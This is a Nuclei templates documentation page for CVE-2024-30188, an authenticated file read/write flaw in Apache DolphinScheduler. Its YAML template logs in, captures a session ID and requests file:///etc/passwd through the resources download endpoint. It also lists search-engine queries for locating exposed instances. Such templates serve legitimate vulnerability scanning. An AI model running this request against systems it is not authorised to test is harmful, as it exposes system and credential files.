Skip to content
Nuclei Templates

Apache DolphinScheduler >= 3.1.0, < 3.2.2 Resource File Read And Write

ID: CVE-2024-30188

Severity: high

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2024,dolphinscheduler,lfi,apache,authenticated

Description

Section titled “Description”

File read and write vulnerability in Apache DolphinScheduler, authenticated users can illegally access additional resource files. This issue affects Apache DolphinScheduler from 3.1.0 before 3.2.2.

YAML Source

Section titled “YAML Source”
id: CVE-2024-30188


info:
  name: Apache DolphinScheduler >= 3.1.0, < 3.2.2 Resource File Read And Write
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    File read and write vulnerability in Apache DolphinScheduler, authenticated users can illegally access additional resource files. This issue affects Apache DolphinScheduler from 3.1.0 before 3.2.2.
  reference:
    - https://github.com/advisories/GHSA-4vv4-crw4-8pcw
    - https://github.com/Mr-xn/Penetration_Testing_POC
    - https://nvd.nist.gov/vuln/detail/CVE-2024-30188
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 8.1
    cve-id: CVE-2024-30188
    epss-score: 0.00045
    epss-percentile: 0.16536
    cpe: cpe:2.3:a:apache:dolphinscheduler:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: apache
    product: dolphinscheduler
    shodan-query: http.title:"dolphinscheduler"
    fofa-query: title="dolphinscheduler"
    google-query: intitle:"dolphinscheduler"
  tags: cve,cve2024,dolphinscheduler,lfi,apache,authenticated


variables:
  username: "{{username}}"
  password: "{{password}}"


flow: http(1) && http(2)


http:
  - raw:
      - |-
        POST /dolphinscheduler/login HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive
        Content-Type: application/x-www-form-urlencoded


        userName={{username}}&userPassword={{password}}&ssoLoginUrl=


    extractors:
      - type: json
        name: sessionId
        part: body
        json:
          - ".data.sessionId"
        internal: true


  - raw:
      - |
        GET /dolphinscheduler/resources/download?fullName=file:///etc/passwd  HTTP/1.1
        Host: {{Hostname}}
        sessionId: {{sessionId}}


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"


      - type: regex
        part: content_type
        regex:
          - "application/json"


      - type: status
        status:
          - 200
# digest: 4b0a004830460221008067c20527b6809c2e85a1471332e7042099fdb4f7fe722e59173bac8e6d23fd022100c5be45434d5be17944b96a8e3f74f398a44feddc3f98d87df76ba0a86d3cf359:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-30188.yaml"

View on Github